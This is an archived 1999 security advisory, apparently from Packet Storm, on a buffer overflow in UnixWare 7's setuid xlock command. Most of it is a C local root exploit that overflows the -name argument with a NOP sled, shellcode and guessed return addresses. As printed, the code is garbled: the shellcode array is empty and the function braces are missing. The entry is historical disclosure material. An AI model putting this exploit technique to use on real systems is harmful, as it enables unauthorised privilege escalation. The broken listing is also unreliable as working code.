Type packetstorm
Reporter Packet Storm
Modified 1999-11-26T00:00:00


-----Original Message-----  
Date: Fri, 26 Nov 1999 04:29:42 +0300 (MSK)  
From: Matt Conover <shok@cannabis.dataforce.net>  
To: news@technotronic.com  
Subject: [w00giving '99 #7]: UnixWare 7's xlock  
MIME-Version: 1.0  
Content-Type: TEXT/PLAIN; charset=US-ASCII  
w00w00 Security Development (WSD)  
Discovered by: K2 (ktwo@ktwo.ca)  
The xlock command on SCO's UnixWare 7 has improper bounds checking on the  
username passed (via argv[1]), which can cause a buffer overflow when  
a lengthy username is passed.  
Exploit (by K2):  
// UnixWare7 /usr/bin/xlock local, K2, revisited Oct-30-1999  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <string.h>  
char shell[] =  
#define SIZE 1200  
#define NOPDEF 601  
#define DEFOFF -400  
const char x86_nop=0x90;  
long nop=NOPDEF,esp;  
long offset=DEFOFF;  
char buffer[SIZE];  
long get_esp() { __asm__("movl %esp,%eax"); }  
int main (int argc, char *argv[])  
register int i;  
if (argc > 1) offset += strtol(argv[1], NULL, 0);  
if (argc > 2) nop += strtoul(argv[2], NULL, 0);  
esp = get_esp();  
memset(buffer, x86_nop, SIZE);  
memcpy(buffer+nop, shell, strlen(shell));  
for (i = nop+strlen(shell); i < SIZE-4; i += 4)  
*((int *) &buffer[i]) = esp+offset;  
printf("jmp = [0x%x]\toffset = [%d]\n",esp+offset,offset);  
execl("/usr/X/bin/xlock", "xlock", "-name", buffer, NULL);  
printf("exec failed!\n");  
return 0;  
As stated in the previous advisory, wait for SCO to release a patch.  
Because of the /var/sadm permissions vulnerability we published earlier  
hasn't been fixed yet, be sure you take off suid privileges on the backed  
up binary! =)  
Hellos to the usuals